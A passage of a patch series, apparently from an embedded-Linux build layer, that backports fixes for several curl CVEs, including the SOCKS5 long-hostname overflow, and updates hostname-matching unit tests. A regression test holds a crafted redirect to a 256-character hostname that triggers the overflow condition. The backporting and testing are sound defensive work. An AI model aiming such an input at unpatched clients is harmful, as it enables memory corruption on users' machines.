++<name>
++Curl_cert_hostcheck unit tests
++</name>
+ </client>
+-
+ </testcase>
+--- a/tests/unit/unit1397.c
++++ b/tests/unit/unit1397.c
+@@ -21,8 +21,6 @@
+  ***************************************************************************/
+ #include "curlcheck.h"
+ 
+-#include "hostcheck.h" /* from the lib dir */
+-
+ static CURLcode unit_setup(void)
+ {
+   return CURLE_OK;
+@@ -30,50 +28,94 @@ static CURLcode unit_setup(void)
+ 
+ static void unit_stop(void)
+ {
+-  /* done before shutting down and exiting */
+ }
+ 
+-UNITTEST_START
++* only these backends define the tested functions */
++#if defined(USE_OPENSSL) || defined(USE_GSKIT) || \
++  defined(USE_SCHANNEL)
++#include "hostcheck.h"
++struct testcase {
++  const char *host;
++  const char *pattern;
++  bool match;
++};
++
++static struct testcase tests[] = {
++  {"", "", FALSE},
++  {"a", "", FALSE},
++  {"", "b", FALSE},
++  {"a", "b", FALSE},
++  {"aa", "bb", FALSE},
++  {"\xff", "\xff", TRUE},
++  {"aa.aa.aa", "aa.aa.bb", FALSE},
++  {"aa.aa.aa", "aa.aa.aa", TRUE},
++  {"aa.aa.aa", "*.aa.bb", FALSE},
++  {"aa.aa.aa", "*.aa.aa", TRUE},
++  {"192.168.0.1", "192.168.0.1", TRUE},
++  {"192.168.0.1", "*.168.0.1", FALSE},
++  {"192.168.0.1", "*.0.1", FALSE},
++  {"h.ello", "*.ello", FALSE},
++  {"h.ello.", "*.ello", FALSE},
++  {"h.ello", "*.ello.", FALSE},
++  {"h.e.llo", "*.e.llo", TRUE},
++  {"h.e.llo", " *.e.llo", FALSE},
++  {" h.e.llo", "*.e.llo", TRUE},
++  {"h.e.llo.", "*.e.llo", TRUE},
++  {"*.e.llo.", "*.e.llo", TRUE},
++  {"************.e.llo.", "*.e.llo", TRUE},
++  {"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
++   "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
++   "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
++   "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
++   "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
++   ".e.llo.", "*.e.llo", TRUE},
++  {"\xfe\xfe.e.llo.", "*.e.llo", TRUE},
++  {"h.e.llo.", "*.e.llo.", TRUE},
++  {"h.e.llo", "*.e.llo.", TRUE},
++  {".h.e.llo", "*.e.llo.", FALSE},
++  {"h.e.llo", "*.*.llo.", FALSE},
++  {"h.e.llo", "h.*.llo", FALSE},
++  {"h.e.llo", "h.e.*", FALSE},
++  {"hello", "*.ello", FALSE},
++  {"hello", "**llo", FALSE},
++  {"bar.foo.example.com", "*.example.com", FALSE},
++  {"foo.example.com", "*.example.com", TRUE},
++  {"baz.example.net", "b*z.example.net", FALSE},
++  {"foobaz.example.net", "*baz.example.net", FALSE},
++  {"xn--l8j.example.local", "x*.example.local", FALSE},
++  {"xn--l8j.example.net", "*.example.net", TRUE},
++  {"xn--l8j.example.net", "*j.example.net", FALSE},
++  {"xn--l8j.example.net", "xn--l8j.example.net", TRUE},
++  {"xn--l8j.example.net", "xn--l8j.*.net", FALSE},
++  {"xl8j.example.net", "*.example.net", TRUE},
++  {"fe80::3285:a9ff:fe46:b619", "*::3285:a9ff:fe46:b619", FALSE},
++  {"fe80::3285:a9ff:fe46:b619", "fe80::3285:a9ff:fe46:b619", TRUE},
++  {NULL, NULL, FALSE}
++};
+ 
+-/* only these backends define the tested functions */
+-#if defined(USE_OPENSSL) || defined(USE_GSKIT)
++UNITTEST_START
++{
++  int i;
++  for(i = 0; tests[i].host; i++) {
++    if(tests[i].match != Curl_cert_hostcheck(tests[i].pattern,
++                                             tests[i].host)) {
++      fprintf(stderr,
++              "HOST: %s\n"
++              "PTRN: %s\n"
++              "did %sMATCH\n",
++              tests[i].host,
++              tests[i].pattern,
++              tests[i].match ? "NOT ": "");
++      unitfail++;
++    }
++  }
++}
+ 
+-  /* here you start doing things and checking that the results are good */
++UNITTEST_STOP
++#else
+ 
+-fail_unless(Curl_cert_hostcheck("www.example.com", "www.example.com"),
+-            "good 1");
+-fail_unless(Curl_cert_hostcheck("*.example.com", "www.example.com"),
+-            "good 2");
+-fail_unless(Curl_cert_hostcheck("xxx*.example.com", "xxxwww.example.com"),
+-            "good 3");
+-fail_unless(Curl_cert_hostcheck("f*.example.com", "foo.example.com"),
+-            "good 4");
+-fail_unless(Curl_cert_hostcheck("192.168.0.0", "192.168.0.0"),
+-            "good 5");
+-
+-fail_if(Curl_cert_hostcheck("xxx.example.com", "www.example.com"), "bad 1");
+-fail_if(Curl_cert_hostcheck("*", "www.example.com"), "bad 2");
+-fail_if(Curl_cert_hostcheck("*.*.com", "www.example.com"), "bad 3");
+-fail_if(Curl_cert_hostcheck("*.example.com", "baa.foo.example.com"), "bad 4");
+-fail_if(Curl_cert_hostcheck("f*.example.com", "baa.example.com"), "bad 5");
+-fail_if(Curl_cert_hostcheck("*.com", "example.com"), "bad 6");
+-fail_if(Curl_cert_hostcheck("*fail.com", "example.com"), "bad 7");
+-fail_if(Curl_cert_hostcheck("*.example.", "www.example."), "bad 8");
+-fail_if(Curl_cert_hostcheck("*.example.", "www.example"), "bad 9");
+-fail_if(Curl_cert_hostcheck("", "www"), "bad 10");
+-fail_if(Curl_cert_hostcheck("*", "www"), "bad 11");
+-fail_if(Curl_cert_hostcheck("*.168.0.0", "192.168.0.0"), "bad 12");
+-fail_if(Curl_cert_hostcheck("www.example.com", "192.168.0.0"), "bad 13");
+-
+-#ifdef ENABLE_IPV6
+-fail_if(Curl_cert_hostcheck("*::3285:a9ff:fe46:b619",
+-                            "fe80::3285:a9ff:fe46:b619"), "bad 14");
+-fail_unless(Curl_cert_hostcheck("fe80::3285:a9ff:fe46:b619",
+-                                "fe80::3285:a9ff:fe46:b619"), "good 6");
+-#endif
++UNITTEST_START
+ 
++UNITTEST_STOP
+ #endif
+ 
+-  /* you end the test code like this: */
+-
+-UNITTEST_STOP
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28322.patch b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
new file mode 100644
index 0000000000..9351a2c286
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
@@ -0,0 +1,380 @@
+CVE: CVE-2023-28322
+Upstream-Status: Backport [ import patch from ubuntu curl_7.68.0-1ubuntu2.20
+upstream https://github.com/curl/curl/commit/7815647d6582c0a4900be2e1de ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 7815647d6582c0a4900be2e1de6c5e61272c496b Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 25 Apr 2023 08:28:01 +0200
+Subject: [PATCH] lib: unify the upload/method handling
+
+By making sure we set state.upload based on the set.method value and not
+independently as set.upload, we reduce confusion and mixup risks, both
+internally and externally.
+
+Closes #11017
+---
+ lib/curl_rtmp.c    | 4 ++--
+ lib/file.c         | 4 ++--
+ lib/ftp.c          | 8 ++++----
+ lib/http.c         | 4 ++--
+ lib/imap.c         | 6 +++---
+ lib/rtsp.c         | 4 ++--
+ lib/setopt.c       | 6 ++----
+ lib/smb.c          | 6 +++---
+ lib/smtp.c         | 4 ++--
+ lib/tftp.c         | 8 ++++----
+ lib/transfer.c     | 4 ++--
+ lib/urldata.h      | 2 +-
+ lib/vssh/libssh.c  | 6 +++---
+ lib/vssh/libssh2.c | 6 +++---
+ lib/vssh/wolfssh.c | 2 +-
+ 15 files changed, 36 insertions(+), 38 deletions(-)
+
+--- a/lib/curl_rtmp.c
++++ b/lib/curl_rtmp.c
+@@ -213,7 +213,7 @@ static CURLcode rtmp_connect(struct conn
+   /* We have to know if it's a write before we send the
+    * connect request packet
+    */
+-  if(conn->data->set.upload)
++  if(conn->data->state.upload)
+     r->Link.protocol |= RTMP_FEATURE_WRITE;
+ 
+   /* For plain streams, use the buffer toggle trick to keep data flowing */
+@@ -245,7 +245,7 @@ static CURLcode rtmp_do(struct connectda
+   if(!RTMP_ConnectStream(r, 0))
+     return CURLE_FAILED_INIT;
+ 
+-  if(conn->data->set.upload) {
++  if(conn->data->state.upload) {
+     Curl_pgrsSetUploadSize(data, data->state.infilesize);
+     Curl_setup_transfer(data, -1, -1, FALSE, FIRSTSOCKET);
+   }
+--- a/lib/file.c
++++ b/lib/file.c
+@@ -198,7 +198,7 @@ static CURLcode file_connect(struct conn
+   file->freepath = real_path; /* free this when done */
+ 
+   file->fd = fd;
+-  if(!data->set.upload && (fd == -1)) {
++  if(!data->state.upload && (fd == -1)) {
+     failf(data, "Couldn't open file %s", data->state.up.path);
+     file_done(conn, CURLE_FILE_COULDNT_READ_FILE, FALSE);
+     return CURLE_FILE_COULDNT_READ_FILE;
+@@ -390,7 +390,7 @@ static CURLcode file_do(struct connectda
+ 
+   Curl_pgrsStartNow(data);
+ 
+-  if(data->set.upload)
++  if(data->state.upload)
+     return file_upload(conn);
+ 
+   file = conn->data->req.protop;
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -1371,7 +1371,7 @@ static CURLcode ftp_state_prepare_transf
+                 data->set.str[STRING_CUSTOMREQUEST]:
+                 (data->set.ftp_list_only?"NLST":"LIST"));
+       }
+-      else if(data->set.upload) {
++      else if(data->state.upload) {
+         PPSENDF(&conn->proto.ftpc.pp, "PRET STOR %s", conn->proto.ftpc.file);
+       }
+       else {
+@@ -3303,7 +3303,7 @@ static CURLcode ftp_done(struct connectd
+     /* the response code from the transfer showed an error already so no
+        use checking further */
+     ;
+-  else if(data->set.upload) {
++  else if(data->state.upload) {
+     if((-1 != data->state.infilesize) &&
+        (data->state.infilesize != data->req.writebytecount) &&
+        !data->set.crlf &&
+@@ -3570,7 +3570,7 @@ static CURLcode ftp_do_more(struct conne
+                            connected back to us */
+       }
+     }
+-    else if(data->set.upload) {
++    else if(data->state.upload) {
+       result = ftp_nb_type(conn, data->set.prefer_ascii, FTP_STOR_TYPE);
+       if(result)
+         return result;
+@@ -4209,7 +4209,7 @@ CURLcode ftp_parse_url_path(struct conne
+     ftpc->file = NULL; /* instead of point to a zero byte,
+                             we make it a NULL pointer */
+ 
+-  if(data->set.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
++  if(data->state.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
+     /* We need a file name when uploading. Return error! */
+     failf(data, "Uploading to a URL without a file name!");
+     free(rawPath);
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -2080,7 +2080,7 @@ CURLcode Curl_http(struct connectdata *c
+   }
+ 
+   if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
+-     data->set.upload) {
++     data->state.upload) {
+     httpreq = HTTPREQ_PUT;
+   }
+ 
+@@ -2261,7 +2261,7 @@ CURLcode Curl_http(struct connectdata *c
+     if((conn->handler->protocol & PROTO_FAMILY_HTTP) &&
+        (((httpreq == HTTPREQ_POST_MIME || httpreq == HTTPREQ_POST_FORM) &&
+          http->postsize < 0) ||
+-        ((data->set.upload || httpreq == HTTPREQ_POST) &&
++        ((data->state.upload || httpreq == HTTPREQ_POST) &&
+          data->state.infilesize == -1))) {
+       if(conn->bits.authneg)
+         /* don't enable chunked during auth neg */
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -1469,11 +1469,11 @@ static CURLcode imap_done(struct connect
+     result = status;         /* use the already set error code */
+   }
+   else if(!data->set.connect_only && !imap->custom &&
+-          (imap->uid || imap->mindex || data->set.upload ||
++          (imap->uid || imap->mindex || data->state.upload ||
+           data->set.mimepost.kind != MIMEKIND_NONE)) {
+     /* Handle responses after FETCH or APPEND transfer has finished */
+ 
+-    if(!data->set.upload && data->set.mimepost.kind == MIMEKIND_NONE)
++    if(!data->state.upload && data->set.mimepost.kind == MIMEKIND_NONE)
+       state(conn, IMAP_FETCH_FINAL);
+     else {
+       /* End the APPEND command first by sending an empty line */
+@@ -1539,7 +1539,7 @@ static CURLcode imap_perform(struct conn
+     selected = TRUE;
+ 
+   /* Start the first command in the DO phase */
+-  if(conn->data->set.upload || data->set.mimepost.kind != MIMEKIND_NONE)
++  if(conn->data->state.upload || data->set.mimepost.kind != MIMEKIND_NONE)
+     /* APPEND can be executed directly */
+     result = imap_perform_append(conn);
+   else if(imap->custom && (selected || !imap->mailbox))
+--- a/lib/rtsp.c
++++ b/lib/rtsp.c
+@@ -499,7 +499,7 @@ static CURLcode rtsp_do(struct connectda
+      rtspreq == RTSPREQ_SET_PARAMETER ||
+      rtspreq == RTSPREQ_GET_PARAMETER) {
+ 
+-    if(data->set.upload) {
++    if(data->state.upload) {
+       putsize = data->state.infilesize;
+       data->set.httpreq = HTTPREQ_PUT;
+ 
+@@ -518,7 +518,7 @@ static CURLcode rtsp_do(struct connectda
+         result =
+           Curl_add_bufferf(&req_buffer,
+                            "Content-Length: %" CURL_FORMAT_CURL_OFF_T"\r\n",
+-                           (data->set.upload ? putsize : postsize));
++                           (data->state.upload ? putsize : postsize));
+         if(result)
+           return result;
+       }
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -258,8 +258,8 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+      * We want to sent data to the remote host. If this is HTTP, that equals
+      * using the PUT request.
+      */
+-    data->set.upload = (0 != va_arg(param, long)) ? TRUE : FALSE;
+-    if(data->set.upload) {
++    arg = va_arg(param, long);
++    if(arg) {
+       /* If this is HTTP, PUT is what's needed to "upload" */
+       data->set.httpreq = HTTPREQ_PUT;
+       data->set.opt_no_body = FALSE; /* this is implied */
+@@ -486,7 +486,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+     }
+     else
+       data->set.httpreq = HTTPREQ_GET;
+-    data->set.upload = FALSE;
+     break;
+ 
+   case CURLOPT_COPYPOSTFIELDS:
+@@ -797,7 +796,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+      */
+     if(va_arg(param, long)) {
+       data->set.httpreq = HTTPREQ_GET;
+-      data->set.upload = FALSE; /* switch off upload */
+       data->set.opt_no_body = FALSE; /* this is implied */
+     }
+     break;
+--- a/lib/smb.c
++++ b/lib/smb.c
+@@ -516,7 +516,7 @@ static CURLcode smb_send_open(struct con
+   byte_count = strlen(req->path);
+   msg.name_length = smb_swap16((unsigned short)byte_count);
+   msg.share_access = smb_swap32(SMB_FILE_SHARE_ALL);
+-  if(conn->data->set.upload) {
++  if(conn->data->state.upload) {
+     msg.access = smb_swap32(SMB_GENERIC_READ | SMB_GENERIC_WRITE);
+     msg.create_disposition = smb_swap32(SMB_FILE_OVERWRITE_IF);
+   }
+@@ -792,7 +792,7 @@ static CURLcode smb_request_state(struct
+     smb_m = (const struct smb_nt_create_response*) msg;
+     req->fid = smb_swap16(smb_m->fid);
+     conn->data->req.offset = 0;
+-    if(conn->data->set.upload) {
++    if(conn->data->state.upload) {
+       conn->data->req.size = conn->data->state.infilesize;
+       Curl_pgrsSetUploadSize(conn->data, conn->data->req.size);
+       next_state = SMB_UPLOAD;
+--- a/lib/smtp.c
++++ b/lib/smtp.c
+@@ -1210,7 +1210,7 @@ static CURLcode smtp_done(struct connect
+     result = status;         /* use the already set error code */
+   }
+   else if(!data->set.connect_only && data->set.mail_rcpt &&
+-          (data->set.upload || data->set.mimepost.kind)) {
++          (data->state.upload || data->set.mimepost.kind)) {
+     /* Calculate the EOB taking into account any terminating CRLF from the
+        previous line of the email or the CRLF of the DATA command when there
+        is "no mail data". RFC-5321, sect. 4.1.1.4.
+@@ -1297,7 +1297,7 @@ static CURLcode smtp_perform(struct conn
+   smtp->eob = 2;
+ 
+   /* Start the first command in the DO phase */
+-  if((data->set.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
++  if((data->state.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
+     /* MAIL transfer */
+     result = smtp_perform_mail(conn);
+   else
+--- a/lib/tftp.c
++++ b/lib/tftp.c
+@@ -390,7 +390,7 @@ static CURLcode tftp_parse_option_ack(tf
+ 
+       /* tsize should be ignored on upload: Who cares about the size of the
+          remote file? */
+-      if(!data->set.upload) {
++      if(!data->state.upload) {
+         if(!tsize) {
+           failf(data, "invalid tsize -:%s:- value in OACK packet", value);
+           return CURLE_TFTP_ILLEGAL;
+@@ -470,7 +470,7 @@ static CURLcode tftp_send_first(tftp_sta
+       return result;
+     }
+ 
+-    if(data->set.upload) {
++    if(data->state.upload) {
+       /* If we are uploading, send an WRQ */
+       setpacketevent(&state->spacket, TFTP_EVENT_WRQ);
+       state->conn->data->req.upload_fromhere =
+@@ -505,7 +505,7 @@ static CURLcode tftp_send_first(tftp_sta
+     if(!data->set.tftp_no_options) {
+       char buf[64];
+       /* add tsize option */
+-      if(data->set.upload && (data->state.infilesize != -1))
++      if(data->state.upload && (data->state.infilesize != -1))
+         msnprintf(buf, sizeof(buf), "%" CURL_FORMAT_CURL_OFF_T,
+                   data->state.infilesize);
+       else
+@@ -559,7 +559,7 @@ static CURLcode tftp_send_first(tftp_sta
+     break;
+ 
+   case TFTP_EVENT_OACK:
+-    if(data->set.upload) {
++    if(data->state.upload) {
+       result = tftp_connect_for_tx(state, event);
+     }
+     else {
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1405,6 +1405,7 @@ void Curl_init_CONNECT(struct Curl_easy
+ {
+   data->state.fread_func = data->set.fread_func_set;
+   data->state.in = data->set.in_set;
++  data->state.upload = (data->set.httpreq == HTTPREQ_PUT);
+ }
+ 
+ /*
+@@ -1816,7 +1817,7 @@ CURLcode Curl_retry_request(struct conne
+ 
+   /* if we're talking upload, we can't do the checks below, unless the protocol
+      is HTTP as when uploading over HTTP we will still get a response */
+-  if(data->set.upload &&
++  if(data->state.upload &&
+      !(conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_RTSP)))
+     return CURLE_OK;
+ 
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1427,6 +1427,7 @@ struct UrlState {
+   BIT(stream_depends_e); /* set or don't set the Exclusive bit */
+   BIT(previouslypending); /* this transfer WAS in the multi->pending queue */
+   BIT(cookie_engine);
++  BIT(upload);         /* upload request */
+ };
+ 
+ 
+@@ -1762,7 +1763,6 @@ struct UserDefined {
+   BIT(http_auto_referer); /* set "correct" referer when following
+                              location: */
+   BIT(opt_no_body);    /* as set with CURLOPT_NOBODY */
+-  BIT(upload);         /* upload request */
+   BIT(verbose);        /* output verbosity */
+   BIT(krb);            /* Kerberos connection requested */
+   BIT(reuse_forbid);   /* forbidden to be reused, close after use */
+--- a/lib/vssh/libssh.c
++++ b/lib/vssh/libssh.c
+@@ -1076,7 +1076,7 @@ static CURLcode myssh_statemach_act(stru
+     }
+ 
+     case SSH_SFTP_TRANS_INIT:
+-      if(data->set.upload)
++      if(data->state.upload)
+         state(conn, SSH_SFTP_UPLOAD_INIT);
+       else {
+         if(protop->path[strlen(protop->path)-1] == '/')
+@@ -1686,7 +1686,7 @@ static CURLcode myssh_statemach_act(stru
+       /* Functions from the SCP subsystem cannot handle/return SSH_AGAIN */
+       ssh_set_blocking(sshc->ssh_session, 1);
+ 
+-      if(data->set.upload) {
++      if(data->state.upload) {
+         if(data->state.infilesize < 0) {
+           failf(data, "SCP requires a known file size for upload");
+           sshc->actualcode = CURLE_UPLOAD_FAILED;
+@@ -1787,7 +1787,7 @@ static CURLcode myssh_statemach_act(stru
+         break;
+       }
+     case SSH_SCP_DONE:
+-      if(data->set.upload)
++      if(data->state.upload)
+         state(conn, SSH_SCP_SEND_EOF);
+       else
+         state(conn, SSH_SCP_CHANNEL_FREE);
+--- a/lib/vssh/libssh2.c
++++ b/lib/vssh/libssh2.c
+@@ -1664,7 +1664,7 @@ static CURLcode ssh_statemach_act(struct
+     }
+ 
+     case SSH_SFTP_TRANS_INIT:
+-      if(data->set.upload)
++      if(data->state.upload)
+         state(conn, SSH_SFTP_UPLOAD_INIT);
+       else {
+         if(sftp_scp->path[strlen(sftp_scp->path)-1] == '/')
+@@ -2366,7 +2366,7 @@ static CURLcode ssh_statemach_act(struct
+         break;
+       }
+ 
+-      if(data->set.upload) {
++      if(data->state.upload) {
+         if(data->state.infilesize < 0) {
+           failf(data, "SCP requires a known file size for upload");
+           sshc->actualcode = CURLE_UPLOAD_FAILED;
+@@ -2504,7 +2504,7 @@ static CURLcode ssh_statemach_act(struct
+     break;
+ 
+     case SSH_SCP_DONE:
+-      if(data->set.upload)
++      if(data->state.upload)
+         state(conn, SSH_SCP_SEND_EOF);
+       else
+         state(conn, SSH_SCP_CHANNEL_FREE);
diff --git a/meta/recipes-support/curl/curl/CVE-2023-32001.patch b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
new file mode 100644
index 0000000000..f533992bcd
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
@@ -0,0 +1,38 @@
+From 0c667188e0c6cda615a036b8a2b4125f2c404dde Mon Sep 17 00:00:00 2001
+From: SaltyMilk <soufiane.elmelcaoui@gmail.com>
+Date: Mon, 10 Jul 2023 21:43:28 +0200
+Subject: [PATCH] fopen: optimize
+
+Closes #11419
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/0c667188e0c6cda615a036b8a2b4125f2c404dde]
+CVE: CVE-2023-32001
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ lib/fopen.c | 12 ++++++------
+ 1 file changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/lib/fopen.c b/lib/fopen.c
+index c9c9e3d6e73a2..b6e3cadddef65 100644
+--- a/lib/fopen.c
++++ b/lib/fopen.c
+@@ -56,13 +56,13 @@ CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
+   int fd = -1;
+   *tempname = NULL;
+ 
+-  if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
+-    /* a non-regular file, fallback to direct fopen() */
+-    *fh = fopen(filename, FOPEN_WRITETEXT);
+-    if(*fh)
+-      return CURLE_OK;
++  *fh = fopen(filename, FOPEN_WRITETEXT);
++  if(!*fh)
+     goto fail;
+-  }
++  if(fstat(fileno(*fh), &sb) == -1 || !S_ISREG(sb.st_mode))
++    return CURLE_OK;
++  fclose(*fh);
++  *fh = NULL;
+ 
+   result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
+   if(result)
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38545.patch b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
new file mode 100644
index 0000000000..c6b6726886
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
@@ -0,0 +1,148 @@
+From 600a1caeb2312fdee5ef1caf7d613c12a8b2424a Mon Sep 17 00:00:00 2001
+From: Mike Crowe <mac@mcrowe.com>
+Date: Wed, 11 Oct 2023 20:50:28 +0100
+Subject: [PATCH] socks: return error if hostname too long for remote resolve
+To: libcurl development <curl-library@cool.haxx.se>
+
+Prior to this change the state machine attempted to change the remote
+resolve to a local resolve if the hostname was longer than 255
+characters. Unfortunately that did not work as intended and caused a
+security issue.
+
+Name resolvers cannot resolve hostnames longer than 255 characters.
+
+Bug: https://curl.se/docs/CVE-2023-38545.html
+
+Unfortunately CURLE_PROXY and CURLPX_LONG_HOSTNAME were introduced in
+7.73.0 so they can't be used in 7.69.1. Let's use
+CURLE_COULDNT_RESOLVE_HOST as the best available alternative and update
+the test appropriately.
+
+libcurl's test support has been improved considerably since 7.69.1 which
+means that the test must be modified to remove use of %VERSION and
+%TESTNUMBER and the stderr output can no longer be checked.
+
+CVE: CVE-2023-38545
+Upstream-Status: Backport [fb4415d8aee6c1045be932a34fe6107c2f5ed147]
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/socks.c             | 13 +++++----
+ tests/data/Makefile.inc |  2 +-
+ tests/data/test728      | 60 +++++++++++++++++++++++++++++++++++++++++
+ 3 files changed, 69 insertions(+), 6 deletions(-)
+ create mode 100644 tests/data/test728
+
+diff --git a/lib/socks.c b/lib/socks.c
+index 37099130e..f3bf40533 100644
+--- a/lib/socks.c
++++ b/lib/socks.c
+@@ -521,11 +521,14 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
+       infof(conn->data, "SOCKS5: connecting to HTTP proxy %s port %d\n",
+             hostname, remote_port);
+ 
+-    /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
++    /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet. */
+     if(!socks5_resolve_local && hostname_len > 255) {
+-      infof(conn->data, "SOCKS5: server resolving disabled for hostnames of "
+-            "length > 255 [actual len=%zu]\n", hostname_len);
+-      socks5_resolve_local = TRUE;
++      failf(data, "SOCKS5: the destination hostname is too long to be "
++            "resolved remotely by the proxy.");
++      /* This version of libcurl doesn't have CURLE_PROXY and
++       * therefore CURLPX_LONG_HOSTNAME, so let's report the best we
++       * can. */
++      return CURLE_COULDNT_RESOLVE_HOST;
+     }
+ 
+     if(auth & ~(CURLAUTH_BASIC | CURLAUTH_GSSAPI))
+@@ -837,7 +840,7 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
+ 
+     if(!socks5_resolve_local) {
+       socksreq[len++] = 3; /* ATYP: domain name = 3 */
+-      socksreq[len++] = (char) hostname_len; /* one byte address length */
++      socksreq[len++] = (unsigned char) hostname_len; /* one byte length */
+       memcpy(&socksreq[len], hostname, hostname_len); /* address w/o NULL */
+       len += hostname_len;
+       infof(data, "SOCKS5 connect to %s:%d (remotely resolved)\n",
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 3d8565c36..5ee2284ff 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -89,7 +89,7 @@ test662 test663 test664 test665 test666 test667 test668 \
+ test670 test671 test672 test673 \
+ \
+ test700 test701 test702 test703 test704 test705 test706 test707 test708 \
+-test709 test710 test711 test712 test713 test714 test715 test716 test717 \
++test709 test710 test711 test712 test713 test714 test715 test716 test717 test728 \
+ \
+ test800 test801 test802 test803 test804 test805 test806 test807 test808 \
+ test809 test810 test811 test812 test813 test814 test815 test816 test817 \
+diff --git a/tests/data/test728 b/tests/data/test728
+new file mode 100644
+index 000000000..7b1d8b2f3
+--- /dev/null
++++ b/tests/data/test728
+@@ -0,0 +1,60 @@
++<testcase>
++<info>
++<keywords>
++HTTP
++HTTP GET
++SOCKS5
++SOCKS5h
++followlocation
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++# The hostname in this redirect is 256 characters and too long (> 255) for
++# SOCKS5 remote resolve. curl must return error CURLE_PROXY in this case.
++<data>
++HTTP/1.1 301 Moved Permanently
++Location: http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
++Content-Length: 0
++Connection: close
++
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++proxy
++</features>
++<server>
++http
++socks5
++</server>
++ <name>
++SOCKS5h with HTTP redirect to hostname too long
++ </name>
++ <command>
++--no-progress-meter --location --proxy socks5h://%HOSTIP:%SOCKSPORT http://%HOSTIP:%HTTPPORT/728
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++<strip>
++^User-Agent:.*
++</strip>
++<protocol>
++GET /728 HTTP/1.1
++Host: %HOSTIP:%HTTPPORT
++Accept: */*
++
++</protocol>
++<errorcode>
++6
++</errorcode>
++</verify>
++</testcase>
+-- 
+2.39.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38546.patch b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
new file mode 100644
index 0000000000..30ef2fd038
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
@@ -0,0 +1,132 @@
+From 7b67721f12cbe6ed1a41e7332f3b5a7186a5e23f Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 14 Sep 2023 23:28:32 +0200
+Subject: [PATCH] cookie: remove unnecessary struct fields
+To: libcurl development <curl-library@cool.haxx.se>
+
+Plus: reduce the hash table size from 256 to 63. It seems unlikely to
+make much of a speed difference for most use cases but saves 1.5KB of
+data per instance.
+
+Closes #11862
+
+This patch taken from Debian's 7.64.0-4+deb10u7 package which applied with
+only a little fuzz.
+
+CVE: CVE-2023-38546
+Upstream-Status: Backport [61275672b46d9abb32857404]
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/cookie.c | 13 +------------
+ lib/cookie.h |  7 ++-----
+ lib/easy.c   |  4 +---
+ 3 files changed, 4 insertions(+), 20 deletions(-)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index 68054e1c4..a378f28e1 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -114,7 +114,6 @@ static void freecookie(struct Cookie *co)
+   free(co->name);
+   free(co->value);
+   free(co->maxage);
+-  free(co->version);
+   free(co);
+ }
+ 
+@@ -641,11 +640,7 @@ Curl_cookie_add(struct Curl_easy *data,
+           }
+         }
+         else if(strcasecompare("version", name)) {
+-          strstore(&co->version, whatptr);
